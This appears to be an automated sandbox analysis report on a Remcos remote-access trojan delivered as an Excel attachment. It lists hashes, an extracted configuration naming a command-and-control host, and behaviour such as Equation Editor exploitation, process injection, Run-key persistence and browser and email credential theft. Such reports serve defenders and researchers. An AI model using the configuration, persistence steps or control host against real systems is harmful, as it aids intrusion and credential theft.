remcos | 1a49ecab4926721e64c3ef58e9d567bef2d0af4bb8494ee2ef5fd56e713af5cd

Analysis

max time kernel
148s
max time network
127s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
19-03-2024 08:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

scanned Draft Copy.xla.xls
Size

49KB
MD5

903d5012df813abb990f663da1af4c8a
SHA1

18115c32fca740c959e005493511bf3b6842becb
SHA256

1a49ecab4926721e64c3ef58e9d567bef2d0af4bb8494ee2ef5fd56e713af5cd
SHA512

103e9ccda54df1317ba8d14fa5189a54ca303ceff1707826e4b73bd614556a2c2053e486833be4ea09b54398f1f604be00118a39b2cf07d6538ff7c80e7b28e4
SSDEEP

1536:iX68xwcRZrCO+68f4Rdc4AdoOVOrAjtev:iX68ecfrCO+6pRdc4Ado7Am

Score

10^/10

remcos remotehost collection persistence rat spyware stealer

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

buike0147.duckdns.org:14645

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-1C7Y8W
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

NirSoft MailPassView 3 IoCs

Password recovery tool for various email clients

Processes:

resource	yara_rule
behavioral1/memory/1448-394-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView
behavioral1/memory/1448-396-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView
behavioral1/memory/1448-417-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 3 IoCs

Password recovery tool for various web browsers

Processes:

resource	yara_rule
behavioral1/memory/1824-391-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView
behavioral1/memory/1824-389-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView
behavioral1/memory/1824-405-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Nirsoft 10 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1448-394-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral1/memory/1272-398-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/1272-397-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/1448-396-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral1/memory/1272-399-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/1824-391-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/1824-389-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/1272-400-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/1824-405-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/1448-417-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft

Blocklisted process makes network request 8 IoCs

Processes:

EQNEDT32.EXEWScript.exepowershell.exe

flow	pid	process
28	1692	EQNEDT32.EXE
31	2216	WScript.exe
33	2216	WScript.exe
34	2216	WScript.exe
36	2216	WScript.exe
38	2700	powershell.exe
39	2700	powershell.exe
40	2700	powershell.exe

Abuses OpenXML format to download file from external location
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

Processes:

RegAsm.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	RegAsm.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\ProgramData\\MACH.vbs"	powershell.exe

Drops file in System32 directory 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

powershell.exeRegAsm.exe

description	pid	process	target process
PID 2700 set thread context of 1188	2700	powershell.exe	RegAsm.exe
PID 1188 set thread context of 1824	1188	RegAsm.exe	RegAsm.exe
PID 1188 set thread context of 1448	1188	RegAsm.exe	RegAsm.exe
PID 1188 set thread context of 1272	1188	RegAsm.exe	RegAsm.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry
T1012

System Information Discovery
T1082

Processes:

EXCEL.EXE

description ioc process

Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
exploit

Exploitation for Client Execution
T1203

Processes:

EQNEDT32.EXE

pid process

1692 EQNEDT32.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

pid	process
1692	EQNEDT32.EXE

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXEEXCEL.EXE

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Toolbar	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE

Modifies registry class 64 IoCs

Processes:

WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	WINWORD.EXE

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

WScript.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b0b000000010000001600000047006c006f00620061006c005300690067006e0000005300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802020f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	WScript.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

2088 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exeRegAsm.exe

pid process

2460 powershell.exe
2700 powershell.exe
1708 powershell.exe
1824 RegAsm.exe
1824 RegAsm.exe
Suspicious behavior: MapViewOfSection 4 IoCs

Processes:

RegAsm.exe

pid process

1188 RegAsm.exe
1188 RegAsm.exe
1188 RegAsm.exe
1188 RegAsm.exe

pid	process
2088	EXCEL.EXE

pid	process
2460	powershell.exe
2700	powershell.exe
1708	powershell.exe
1824	RegAsm.exe
1824	RegAsm.exe

pid	process
1188	RegAsm.exe
1188	RegAsm.exe
1188	RegAsm.exe
1188	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exeRegAsm.exeWINWORD.EXE

description	pid	process
Token: SeDebugPrivilege	2460	powershell.exe
